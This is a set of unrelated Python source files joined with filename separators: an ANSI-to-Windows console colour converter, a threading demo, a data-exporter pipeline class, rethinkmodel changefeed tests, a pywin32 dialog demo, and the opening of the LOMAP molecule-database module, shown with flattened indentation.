GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
mtsleepC.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: NetworkRanger
# Date: 2019/8/10 3:39 PM
import threading
from time import sleep, ctime
loops = [4,2]
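# Both loops run concurrently, so the script finishes in roughly
# max(4, 2) = 4 seconds rather than the 4 + 2 = 6 seconds a serial run needs.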
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=loop, args=(i, loops[i]))
threads.append(t)
for i in nloops: # start threads
threads[i].start()
for i in nloops: # wait for all
threads[i].join() # threads to finish
print('all DONE at:', ctime())
if __name__ == '__main__':
main() |
base_exporter.py | import datetime
import traceback
from collections import OrderedDict
from contextlib import closing
from exporters.default_retries import disable_retries
from exporters.exporter_config import ExporterConfig
from exporters.logger.base_logger import ExportManagerLogger
from exporters.meta import ExportMeta
from exporters.module_loader import ModuleLoader
from exporters.notifications.notifiers_list import NotifiersList
from exporters.notifications.receiver_groups import CLIENTS, TEAM
from exporters.writers.base_writer import ItemsLimitReached
from exporters.readers.base_stream_reader import is_stream_reader
from six.moves.queue import Queue
from threading import Thread
import time
class BaseExporter(object):
def __init__(self, configuration):
self.config = ExporterConfig(configuration)
self.threaded = self.config.exporter_options.get('threaded', False)
self.queue_size = self.config.exporter_options.get('thread_queue_size', 100)
self.logger = ExportManagerLogger(self.config.log_options)
self.module_loader = ModuleLoader()
metadata = ExportMeta(configuration)
self.metadata = metadata
self.reader = self.module_loader.load_reader(
self.config.reader_options, metadata)
if is_stream_reader(self.reader):
deserializer = self.module_loader.load_deserializer(
self.config.deserializer_options, metadata)
decompressor = self.module_loader.load_decompressor(
self.config.decompressor_options, metadata)
self.reader.deserializer = deserializer
self.reader.decompressor = decompressor
self.filter_before = self.module_loader.load_filter(
self.config.filter_before_options, metadata)
self.filter_after = self.module_loader.load_filter(
self.config.filter_after_options, metadata)
self.transform = self.module_loader.load_transform(
self.config.transform_options, metadata)
self.export_formatter = self.module_loader.load_formatter(
self.config.formatter_options, metadata)
self.writer = self.module_loader.load_writer(
self.config.writer_options, metadata, export_formatter=self.export_formatter)
self.persistence = self.module_loader.load_persistence(
self.config.persistence_options, metadata)
self.grouper = self.module_loader.load_grouper(
self.config.grouper_options, metadata)
self.notifiers = NotifiersList(self.config.notifiers, metadata)
if self.config.disable_retries:
disable_retries()
self.logger.debug('{} has been initiated'.format(self.__class__.__name__))
self.stats_manager = self.module_loader.load_stats_manager(
self.config.stats_options, metadata)
self.bypass_cases = []
def _run_pipeline_iteration(self):
times = OrderedDict([('started', datetime.datetime.now())])
self.logger.debug('Getting new batch')
if self.config.exporter_options.get('forced_reads'):
next_batch = list(self.reader.get_next_batch())
else:
next_batch = self.reader.get_next_batch()
times.update(read=datetime.datetime.now())
next_batch = self.filter_before.filter_batch(next_batch)
times.update(filtered=datetime.datetime.now())
next_batch = self.transform.transform_batch(next_batch)
times.update(transformed=datetime.datetime.now())
next_batch = self.filter_after.filter_batch(next_batch)
times.update(filtered_after=datetime.datetime.now())
next_batch = self.grouper.group_batch(next_batch)
times.update(grouped=datetime.datetime.now())
try:
self.writer.write_batch(batch=next_batch)
times.update(written=datetime.datetime.now())
last_position = self._get_last_position()
self.persistence.commit_position(last_position)
times.update(persisted=datetime.datetime.now())
except ItemsLimitReached:
# we have written some amount of records up to the limit
times.update(written=datetime.datetime.now())
self._iteration_stats_report(times)
raise
else:
self._iteration_stats_report(times)
def _get_last_position(self):
last_position = self.reader.get_last_position()
last_position['writer_metadata'] = self.writer.get_all_metadata()
return last_position
def _init_export_job(self):
self.notifiers.notify_start_dump(receivers=[CLIENTS, TEAM])
last_position = self.persistence.get_last_position()
if last_position is not None:
self.writer.update_metadata(last_position.get('writer_metadata'))
self.metadata.accurate_items_count = last_position.get('accurate_items_count', False)
self.reader.set_last_position(last_position)
def _clean_export_job(self):
try:
self.reader.close()
finally:
self.writer.close()
def _finish_export_job(self):
self.writer.finish_writing()
self.metadata.end_time = datetime.datetime.now()
def bypass_exporter(self, bypass_class):
self.logger.info('Executing bypass {}.'.format(bypass_class.__name__))
self.notifiers.notify_start_dump(receivers=[CLIENTS, TEAM])
if not self.config.exporter_options.get('resume'):
self.persistence.close()
self.persistence.delete()
with closing(bypass_class(self.config, self.metadata)) as bypass:
bypass.execute()
if not bypass.valid_total_count:
self.metadata.accurate_items_count = False
self.logger.warning('No accurate items count info can be retrieved')
self.writer.set_metadata(
'items_count', self.writer.get_metadata('items_count') + bypass.total_items)
self.logger.info(
'Finished executing bypass {}.'.format(bypass_class.__name__))
self._final_stats_report()
self.notifiers.notify_complete_dump(receivers=[CLIENTS, TEAM])
def bypass(self):
if self.config.prevent_bypass:
return False
for bypass_class in self.bypass_cases:
if bypass_class.meets_conditions(self.config):
try:
self.bypass_exporter(bypass_class)
return True
finally:
self._clean_export_job()
return False
def _handle_export_exception(self, exception):
self.logger.error(traceback.format_exc())
self.logger.error(str(exception))
self.notifiers.notify_failed_job(
str(exception), traceback.format_exc(), receivers=[TEAM])
def _iteration_stats_report(self, times):
try:
self.stats_manager.iteration_report(times)
except Exception as e:
traceback.print_exc()
self.logger.error('Error making stats report: {}'.format(str(e)))
def _final_stats_report(self):
try:
self.stats_manager.final_report()
except Exception as e:
self.logger.error('Error making final stats report: {}'.format(str(e)))
def _run_pipeline(self):
while not self.reader.is_finished():
try:
self._run_pipeline_iteration()
except ItemsLimitReached as e:
self.logger.info('{!r}'.format(e))
break
self.writer.flush()
def _reader_thread(self):
self.logger.info('Starting reader thread')
while not self.reader.is_finished():
self.process_queue.put(list(self.reader.get_next_batch()))
qsize = self.process_queue.qsize()
if qsize > 0.5*self.queue_size:
# Queues are getting full, throttle the reader so the processor/writer can keep up
time.sleep((qsize*10.0 / self.queue_size) - 5)
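# With this formula the reader sleeps 1s once the queue is 60% full,
# scaling up to 5s when it is completely full, so the slower stages can drain it.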
self.reader_finished = True
def _process_thread(self):
self.logger.info('Starting processing thread')
while not self.reader_finished or not self.process_queue.empty():
next_batch = self.process_queue.get()
next_batch = self.filter_before.filter_batch(next_batch)
next_batch = self.transform.transform_batch(next_batch)
next_batch = self.filter_after.filter_batch(next_batch)
next_batch = self.grouper.group_batch(next_batch)
self.writer_queue.put(next_batch)
self.process_finished = True
def _writer_thread(self):
self.logger.info('Starting writer thread')
while not self.process_finished or not self.writer_queue.empty():
batch = self.writer_queue.get()
self.writer.write_batch(batch=batch)
self.writer.finish_writing()
self.writer.flush()
def _run_threads(self):
self.reader_finished = False
self.process_finished = False
self.process_queue = Queue(self.queue_size)
self.writer_queue = Queue(self.queue_size)
reader_thread = Thread(target=self._reader_thread)
process_thread = Thread(target=self._process_thread)
writer_thread = Thread(target=self._writer_thread)
reader_thread.start()
process_thread.start()
writer_thread.start()
reader_thread.join()
process_thread.join()
writer_thread.join()
def export(self):
if not self.bypass():
try:
self._init_export_job()
if self.threaded:
self._run_threads()
else:
self._run_pipeline()
self._finish_export_job()
self._final_stats_report()
self.persistence.close()
self.notifiers.notify_complete_dump(receivers=[CLIENTS, TEAM])
except Exception as e:
self._handle_export_exception(e)
raise
finally:
self._clean_export_job()
else:
self.metadata.bypassed_pipeline = True
|
test_feed.py | """Test feed generator."""
import time
from queue import Queue
from threading import Thread
from typing import Optional
from unittest.case import TestCase
from rethinkmodel import config
from rethinkmodel.db import connect
from rethinkmodel.manage import manage
from rethinkmodel.model import Model
from tests.utils import clean
DB_NAME = "test_feed"
class FeededUser(Model):
"""A simple user."""
name: str
pointer: Optional[str]
clean(DB_NAME)
class FeedTest(TestCase):
"""Make some test on feed."""
def setUp(self) -> None:
"""Manage table."""
config(dbname=DB_NAME)
manage(__name__)
return super().setUp()
def test_feed_get(self):
"""Test to detect table change."""
first_call_name = "first"
second_call_name = "second"
queue = Queue()
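# The queue doubles as a handshake: the worker puts True once the changefeed
# is open, and the main thread blocks on get() before writing any document.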
def wait_for_changes():
feed = FeededUser.changes()
queue.put(True)
old, new = next(feed)
self.assertIsNone(old)
self.assertEqual(new.name, first_call_name)
queue.put(True)
old, new = next(feed)
self.assertEqual(old.name, first_call_name)
self.assertEqual(new.name, second_call_name)
thread = Thread(target=wait_for_changes)
thread.start()
# wait for thread to be ready
queue.get()
time.sleep(1)
# first save
user = FeededUser(name=first_call_name).save()
# change name
queue.get()
time.sleep(1)
user.name = second_call_name
user.save()
# stop
thread.join()
def test_with_filter(self):
"""Test to get a feed with a filter."""
queue = Queue()
def filter_user():
feed = FeededUser.changes(select=lambda res: res["name"].eq("foo"))
queue.put(True)
# feed = FeededUser.changes()
old, new = next(feed)
self.assertIsNone(old)
if "foo" not in new.name:
self.fail(
f"The object should only contain 'foo' in name, get {new.name}"
)
thread = Thread(target=filter_user)
thread.start()
queue.get(True)
FeededUser(name="bar1").save() # fail if it's captured
FeededUser(name="foo").save() # should be ok
thread.join()
class FeedOnDeletedTest(TestCase):
"""Make test on deleted objects."""
def setUp(self) -> None:
"""Use soft deletion."""
config(dbname=DB_NAME, soft_delete=True)
return super().setUp()
def test_on_soft_deleted(self):
"""Make test on a deleted feeduser."""
queue = Queue()
def filter_user():
feed = FeededUser.changes(select=lambda res: res["name"].eq("foo"))
queue.put(True)
old, new = next(feed)
if "foo" not in new.name and new.pointer is not None:
self.fail(
f"The object should only contain 'foo' in name and "
f"pointer to None, get {new.name} and {new.pointer}"
)
# also check the old value, just in case
if old and ("foo" not in old.name or old.pointer is not None):
self.fail(
f"The object should only contain 'foo' in name and "
f"pointer to None, got {old.name} and {old.pointer}"
)
# the deleted user
user = FeededUser(name="bar").save()
kept = user.id
user.delete()
# prepare connection
rdb, conn = connect()
thread = Thread(target=filter_user)
thread.start()
# wait for thread to be ready
queue.get()
time.sleep(1)
# this will fail if the object is caught
rdb.table(FeededUser.tablename).get(kept).update(
{"name": "foo", "pointer": "changed"}
).run(conn)
# to close the thread
time.sleep(1)
FeededUser(name="foo").save()
thread.join()
conn.close()
|
win32gui_dialog.py | # A demo of a fairly complex dialog.
#
# Features:
# * Uses a "dynamic dialog resource" to build the dialog.
# * Uses a ListView control.
# * Dynamically resizes content.
# * Uses a second worker thread to fill the list.
# * Demonstrates support for windows XP themes.
# If you are on Windows XP, and specify a '--noxp' argument, you will see:
# * alpha-blend issues with icons
# * The buttons are "old" style, rather than based on the XP theme.
# Hence, using:
# import winxpgui as win32gui
# is recommended.
# Please report any problems.
import sys
if "--noxp" in sys.argv:
import win32gui
else:
import winxpgui as win32gui
import win32api
import win32con, winerror
import struct, array
import commctrl
import Queue
import os
IDC_SEARCHTEXT = 1024
IDC_BUTTON_SEARCH = 1025
IDC_BUTTON_DISPLAY = 1026
IDC_LISTBOX = 1027
WM_SEARCH_RESULT = win32con.WM_USER + 512
WM_SEARCH_FINISHED = win32con.WM_USER + 513
class _WIN32MASKEDSTRUCT:
def __init__(self, **kw):
full_fmt = ""
for name, fmt, default, mask in self._struct_items_:
self.__dict__[name] = None
if fmt == "z":
full_fmt += "pi"
else:
full_fmt += fmt
for name, val in kw.iteritems():
if name not in self.__dict__:
raise ValueError("LVITEM structures do not have an item '%s'" % (name,))
self.__dict__[name] = val
def __setattr__(self, attr, val):
if not attr.startswith("_") and attr not in self.__dict__:
raise AttributeError(attr)
self.__dict__[attr] = val
def toparam(self):
self._buffs = []
full_fmt = ""
vals = []
mask = 0
# calc the mask
for name, fmt, default, this_mask in self._struct_items_:
if this_mask is not None and self.__dict__.get(name) is not None:
mask |= this_mask
self.mask = mask
for name, fmt, default, this_mask in self._struct_items_:
val = self.__dict__[name]
if fmt == "z":
fmt = "Pi"
if val is None:
vals.append(0)
vals.append(0)
else:
# Note this demo still works with byte strings. An
# alternate strategy would be to use unicode natively
# and use the 'W' version of the messages - eg,
# LVM_SETITEMW etc.
val = val + "\0"
if isinstance(val, unicode):
val = val.encode("mbcs")
str_buf = array.array("b", val)
vals.append(str_buf.buffer_info()[0])
vals.append(len(val))
self._buffs.append(str_buf) # keep alive during the call.
else:
if val is None:
val = default
vals.append(val)
full_fmt += fmt
return struct.pack(*(full_fmt,) + tuple(vals))
# NOTE: See the win32gui_struct module for an alternative way of dealing
# with these structures
class LVITEM(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("iItem", "i", 0, None),
("iSubItem", "i", 0, None),
("state", "I", 0, commctrl.LVIF_STATE),
("stateMask", "I", 0, None),
("text", "z", None, commctrl.LVIF_TEXT),
("iImage", "i", 0, commctrl.LVIF_IMAGE),
("lParam", "i", 0, commctrl.LVIF_PARAM),
("iIdent", "i", 0, None),
]
class LVCOLUMN(_WIN32MASKEDSTRUCT):
_struct_items_ = [
("mask", "I", 0, None),
("fmt", "i", 0, commctrl.LVCF_FMT),
("cx", "i", 0, commctrl.LVCF_WIDTH),
("text", "z", None, commctrl.LVCF_TEXT),
("iSubItem", "i", 0, commctrl.LVCF_SUBITEM),
("iImage", "i", 0, commctrl.LVCF_IMAGE),
("iOrder", "i", 0, commctrl.LVCF_ORDER),
]
class DemoWindowBase:
def __init__(self):
win32gui.InitCommonControls()
self.hinst = win32gui.dllhandle
self.list_data = {}
def _RegisterWndClass(self):
className = "PythonDocSearch"
message_map = {}
wc = win32gui.WNDCLASS()
wc.SetDialogProc() # Make it a dialog class.
wc.hInstance = self.hinst
wc.lpszClassName = className
wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW
wc.hCursor = win32gui.LoadCursor( 0, win32con.IDC_ARROW )
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.lpfnWndProc = message_map # could also specify a wndproc.
# C code: wc.cbWndExtra = DLGWINDOWEXTRA + sizeof(HBRUSH) + (sizeof(COLORREF));
wc.cbWndExtra = win32con.DLGWINDOWEXTRA + struct.calcsize("Pi")
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
## py.ico went away in python 2.5, load from executable instead
this_app=win32api.GetModuleHandle(None)
try:
wc.hIcon=win32gui.LoadIcon(this_app, 1) ## python.exe and pythonw.exe
except win32gui.error:
wc.hIcon=win32gui.LoadIcon(this_app, 135) ## pythonwin's icon
try:
classAtom = win32gui.RegisterClass(wc)
except win32gui.error, err_info:
if err_info.winerror!=winerror.ERROR_CLASS_ALREADY_EXISTS:
raise
return className
def _GetDialogTemplate(self, dlgClassName):
style = win32con.WS_THICKFRAME | win32con.WS_POPUP | win32con.WS_VISIBLE | win32con.WS_CAPTION | win32con.WS_SYSMENU | win32con.DS_SETFONT | win32con.WS_MINIMIZEBOX
cs = win32con.WS_CHILD | win32con.WS_VISIBLE
title = "Dynamic Dialog Demo"
# Window frame and title
dlg = [ [title, (0, 0, 210, 250), style, None, (8, "MS Sans Serif"), None, dlgClassName], ]
# ID label and text box
dlg.append([130, "Enter something", -1, (5, 5, 200, 9), cs | win32con.SS_LEFT])
s = cs | win32con.WS_TABSTOP | win32con.WS_BORDER
dlg.append(['EDIT', None, IDC_SEARCHTEXT, (5, 15, 200, 12), s])
# Search/Display Buttons
# (x positions don't matter here)
s = cs | win32con.WS_TABSTOP
dlg.append([128, "Fill List", IDC_BUTTON_SEARCH, (5, 35, 50, 14), s | win32con.BS_DEFPUSHBUTTON])
s = win32con.BS_PUSHBUTTON | s
dlg.append([128, "Display", IDC_BUTTON_DISPLAY, (100, 35, 50, 14), s])
# List control.
# Can't make this work :(
## s = cs | win32con.WS_TABSTOP
## dlg.append(['SysListView32', "Title", IDC_LISTBOX, (5, 505, 200, 200), s])
return dlg
def _DoCreate(self, fn):
message_map = {
win32con.WM_SIZE: self.OnSize,
win32con.WM_COMMAND: self.OnCommand,
win32con.WM_NOTIFY: self.OnNotify,
win32con.WM_INITDIALOG: self.OnInitDialog,
win32con.WM_CLOSE: self.OnClose,
win32con.WM_DESTROY: self.OnDestroy,
WM_SEARCH_RESULT: self.OnSearchResult,
WM_SEARCH_FINISHED: self.OnSearchFinished,
}
dlgClassName = self._RegisterWndClass()
template = self._GetDialogTemplate(dlgClassName)
return fn(self.hinst, template, 0, message_map)
def _SetupList(self):
child_style = win32con.WS_CHILD | win32con.WS_VISIBLE | win32con.WS_BORDER | win32con.WS_HSCROLL | win32con.WS_VSCROLL
child_style |= commctrl.LVS_SINGLESEL | commctrl.LVS_SHOWSELALWAYS | commctrl.LVS_REPORT
self.hwndList = win32gui.CreateWindow("SysListView32", None, child_style, 0, 0, 100, 100, self.hwnd, IDC_LISTBOX, self.hinst, None)
child_ex_style = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETEXTENDEDLISTVIEWSTYLE, 0, 0)
child_ex_style |= commctrl.LVS_EX_FULLROWSELECT
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETEXTENDEDLISTVIEWSTYLE, 0, child_ex_style)
# Add an image list - use the builtin shell folder icon - this
# demonstrates the problem with alpha-blending of icons on XP if
# winxpgui is not used in place of win32gui.
il = win32gui.ImageList_Create(
win32api.GetSystemMetrics(win32con.SM_CXSMICON),
win32api.GetSystemMetrics(win32con.SM_CYSMICON),
commctrl.ILC_COLOR32 | commctrl.ILC_MASK,
1, # initial size
0) # cGrow
shell_dll = os.path.join(win32api.GetSystemDirectory(), "shell32.dll")
large, small = win32gui.ExtractIconEx(shell_dll, 4, 1)
win32gui.ImageList_ReplaceIcon(il, -1, small[0])
win32gui.DestroyIcon(small[0])
win32gui.DestroyIcon(large[0])
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETIMAGELIST,
commctrl.LVSIL_SMALL, il)
# Setup the list control columns.
lvc = LVCOLUMN(mask = commctrl.LVCF_FMT | commctrl.LVCF_WIDTH | commctrl.LVCF_TEXT | commctrl.LVCF_SUBITEM)
lvc.fmt = commctrl.LVCFMT_LEFT
lvc.iSubItem = 1
lvc.text = "Title"
lvc.cx = 200
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
lvc.iSubItem = 0
lvc.text = "Order"
lvc.cx = 50
win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTCOLUMN, 0, lvc.toparam())
win32gui.UpdateWindow(self.hwnd)
def ClearListItems(self):
win32gui.SendMessage(self.hwndList, commctrl.LVM_DELETEALLITEMS)
self.list_data = {}
def AddListItem(self, data, *columns):
num_items = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETITEMCOUNT)
item = LVITEM(text=columns[0], iItem = num_items)
new_index = win32gui.SendMessage(self.hwndList, commctrl.LVM_INSERTITEM, 0, item.toparam())
col_no = 1
for col in columns[1:]:
item = LVITEM(text=col, iItem = new_index, iSubItem = col_no)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETITEM, 0, item.toparam())
col_no += 1
self.list_data[new_index] = data
def OnInitDialog(self, hwnd, msg, wparam, lparam):
self.hwnd = hwnd
# centre the dialog
desktop = win32gui.GetDesktopWindow()
l,t,r,b = win32gui.GetWindowRect(self.hwnd)
dt_l, dt_t, dt_r, dt_b = win32gui.GetWindowRect(desktop)
centre_x, centre_y = win32gui.ClientToScreen( desktop, ( (dt_r-dt_l)//2, (dt_b-dt_t)//2) )
win32gui.MoveWindow(hwnd, centre_x-(r//2), centre_y-(b//2), r-l, b-t, 0)
self._SetupList()
l,t,r,b = win32gui.GetClientRect(self.hwnd)
self._DoSize(r-l,b-t, 1)
def _DoSize(self, cx, cy, repaint = 1):
# right-justify the textbox.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_SEARCHTEXT)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
win32gui.MoveWindow(ctrl, l, t, cx-l-5, b-t, repaint)
# The button.
ctrl = win32gui.GetDlgItem(self.hwnd, IDC_BUTTON_DISPLAY)
l, t, r, b = win32gui.GetWindowRect(ctrl)
l, t = win32gui.ScreenToClient(self.hwnd, (l,t) )
r, b = win32gui.ScreenToClient(self.hwnd, (r,b) )
list_y = b + 10
w = r - l
win32gui.MoveWindow(ctrl, cx - 5 - w, t, w, b-t, repaint)
# The list control
win32gui.MoveWindow(self.hwndList, 0, list_y, cx, cy-list_y, repaint)
# The last column of the list control.
new_width = cx - win32gui.SendMessage(self.hwndList, commctrl.LVM_GETCOLUMNWIDTH, 0)
win32gui.SendMessage(self.hwndList, commctrl.LVM_SETCOLUMNWIDTH, 1, new_width)
def OnSize(self, hwnd, msg, wparam, lparam):
x = win32api.LOWORD(lparam)
y = win32api.HIWORD(lparam)
self._DoSize(x,y)
return 1
def OnSearchResult(self, hwnd, msg, wparam, lparam):
try:
while 1:
params = self.result_queue.get(0)
self.AddListItem(*params)
except Queue.Empty:
pass
def OnSearchFinished(self, hwnd, msg, wparam, lparam):
print "OnSearchFinished"
def OnNotify(self, hwnd, msg, wparam, lparam):
format = "PPiiiiiiiiP"
buf = win32gui.PyMakeBuffer(struct.calcsize(format), lparam)
hwndFrom, idFrom, code, iItem, iSubItem, uNewState, uOldState, uChanged, actionx, actiony, lParam \
= struct.unpack(format, buf)
if code == commctrl.NM_DBLCLK:
print "Double click on item", iItem+1
return 1
def OnCommand(self, hwnd, msg, wparam, lparam):
id = win32api.LOWORD(wparam)
if id == IDC_BUTTON_SEARCH:
self.ClearListItems()
def fill_slowly(q, hwnd):
import time
for i in range(20):
q.put(("whatever", str(i+1), "Search result " + str(i) ))
win32gui.PostMessage(hwnd, WM_SEARCH_RESULT, 0, 0)
time.sleep(.25)
win32gui.PostMessage(hwnd, WM_SEARCH_FINISHED, 0, 0)
import threading
self.result_queue = Queue.Queue()
thread = threading.Thread(target = fill_slowly, args=(self.result_queue, self.hwnd) )
thread.start()
elif id == IDC_BUTTON_DISPLAY:
print "Display button selected"
sel = win32gui.SendMessage(self.hwndList, commctrl.LVM_GETNEXTITEM, -1, commctrl.LVNI_SELECTED)
print "The selected item is", sel+1
# These function differ based on how the window is used, so may be overridden
def OnClose(self, hwnd, msg, wparam, lparam):
raise NotImplementedError
def OnDestroy(self, hwnd, msg, wparam, lparam):
pass
# An implementation suitable for use with the Win32 Window functions (ie, not
# a true dialog)
class DemoWindow(DemoWindowBase):
def CreateWindow(self):
# Create the window via CreateDialogBoxIndirect - it can then
# work as a "normal" window, once a message loop is established.
self._DoCreate(win32gui.CreateDialogIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.DestroyWindow(hwnd)
# We need to arrange to a WM_QUIT message to be sent to our
# PumpMessages() loop.
def OnDestroy(self, hwnd, msg, wparam, lparam):
win32gui.PostQuitMessage(0) # Terminate the app.
# An implementation suitable for use with the Win32 Dialog functions.
class DemoDialog(DemoWindowBase):
def DoModal(self):
return self._DoCreate(win32gui.DialogBoxIndirect)
def OnClose(self, hwnd, msg, wparam, lparam):
win32gui.EndDialog(hwnd, 0)
def DemoModal():
w=DemoDialog()
w.DoModal()
def DemoCreateWindow():
w=DemoWindow()
w.CreateWindow()
# PumpMessages runs until PostQuitMessage() is called by someone.
win32gui.PumpMessages()
if __name__=='__main__':
DemoModal()
DemoCreateWindow()
|
dbmol.py | #******************
# MODULE DOCSTRING
#******************
"""
LOMAP
=====
Alchemical free energy calculations hold increasing promise as an aid to drug
discovery efforts. However, applications of these techniques in discovery
projects have been relatively few, partly because of the difficulty of planning
and setting up calculations. The Lead Optimization Mapper (LOMAP) is an
automated algorithm to plan efficient relative free energy calculations between
potential ligands within a substantial set of compounds.
"""
#*****************************************************************************
# Lomap2: A toolkit to plan alchemical relative binding affinity calculations
# Copyright 2015 - 2016 UC Irvine and the Authors
#
# Authors: Dr Gaetano Calabro' and Dr David Mobley
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, see http://www.gnu.org/licenses/
#*****************************************************************************
#****************
# MODULE IMPORTS
#****************
from rdkit import Chem
import numpy as np
from lomap import mcs
from lomap import fp
from lomap import graphgen
import sys,os
import math
import multiprocessing
import networkx as nx
import logging
import glob
import argparse
import pickle
from rdkit import DataStructs
from rdkit.Chem.Fingerprints import FingerprintMols
__all__ = ['DBMolecules', 'SMatrix', 'Molecule']
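# A minimal usage sketch (an illustration only, not part of the library; it
# assumes a directory './ligands' holding at least two .mol2 files):
#
#     db_mol = DBMolecules('./ligands', parallel=2, output=True, name='out')
#     strict, loose = db_mol.build_matrices()
#     nx_graph = db_mol.build_graph()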
#*************************
# Molecule Database Class
#*************************
class DBMolecules(object):
"""
This class is used as a container for all the Molecules
"""
# Initialization function
def __init__(self, directory, parallel=1, verbose='off',
time=20, ecrscore=0.0, output=False,
name='out', display=False,
max=6, cutoff=0.4, radial=False, hub=None, fingerprint=False, fast=False):
"""
Initialization of the Molecule Database Class
Parameters
----------
directory : str
the mol2 directory file name
parallel : int
the number of cores used to generate the similarity score matrices
verbose : bool
verbose mode
time : int
the maximum time in seconds used to perform the MCS search
ecrscore: float
the electrostatic score to be used (if != 0) when two molecules have different charges
output : bool
a flag used to generate or not the output files
name : str
the file name prefix used to produce the output files
display : bool
a flag used to display or not a network made by using matplotlib
max : int
the maximum distance used to cluster the graph nodes
cutoff : float
the Minimum Similarity Score (MSS) used to build the graph
"""
# Set the Logging
if verbose == 'off':
logging.basicConfig(format='%(message)s', level=logging.CRITICAL)
if verbose == 'info':
logging.basicConfig(format='%(message)s', level=logging.INFO)
if verbose == 'pedantic':
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
#logging.basicConfig(format='%(levelname)s:\t%(message)s', level=logging.DEBUG)
if __name__ == '__main__':
self.options = parser.parse_args()
else:
if not isinstance(output, bool):
raise TypeError('The output flag is not a bool type')
if not isinstance(display, bool):
raise TypeError('The display flag is not a bool type')
if not isinstance(radial, bool):
raise TypeError('The radial flag is not a bool type')
output_str=''
display_str=''
radial_str=''
fingerprint_str=''
fast_str=''
parser.set_defaults(output=output)
parser.set_defaults(display=display)
parser.set_defaults(radial=radial)
parser.set_defaults(fingerprint=fingerprint)
parser.set_defaults(fast=fast)
if output:
output_str='--output'
if display:
display_str='--display'
if radial:
radial_str='--radial'
if fingerprint:
fingerprint_str='--fingerprint'
if fast:
fast_str = '--fast'
names_str = '%s --parallel %s --verbose %s --time %s --ecrscore %s --name %s --max %s --cutoff %s --hub %s %s %s %s %s %s'\
% (directory, parallel, verbose, time, ecrscore, name, max, cutoff, hub, output_str, display_str, radial_str, fingerprint_str, fast_str)
self.options = parser.parse_args(names_str.split())
# Internal list container used to store the loaded molecule objects
self.__list = self.read_mol2_files()
# Dictionary which holds the mapping between the generated molecule IDs and molecule file names
self.dic_mapping = {}
for mol in self.__list:
self.dic_mapping[mol.getID()]=mol.getName()
# Index used to perform index selection by using __iter__ function
self.__ci = 0
# Symmetric matrices used to store the mcs scoring. The matrices are subclasses of numpy
self.strict_mtx = SMatrix(shape=(0,))
self.loose_mtx = SMatrix(shape=(0,))
# Empty pointer to the networkx graph
self.Graph = nx.Graph()
def __iter__(self):
"""
Index generator
"""
return self
def next(self): # Python 3: def __next__(self)
"""
Select the molecule during an iteration
"""
if self.__ci > len(self.__list) - 1:
self.__ci = 0
raise StopIteration
else:
self.__ci = self.__ci + 1
return self.__list[self.__ci - 1]
def __getitem__(self, index):
"""
Slicing and index selection function
"""
return self.__list[index]
def __setitem__(self, index, molecule):
"""
Index setting function
Parameters
----------
index : int
the molecule index
molecule : Molecule obj
the molecule to assign to the molecule database by selecting the index:
DB[index] = molecule
"""
if not isinstance(molecule, Molecule):
raise ValueError('The passed molecule is not a Molecule object')
self.__list[index] = molecule
def __add__(self, molecule):
"""
Add a new molecule to the molecule database
Parameters
----------
molecule : Molecule obj
the molecule to append into the molecule database
"""
if not isinstance(molecule, Molecule):
raise ValueError('The passed molecule is not a Molecule object')
self.__list.append(molecule)
def nums(self):
"""
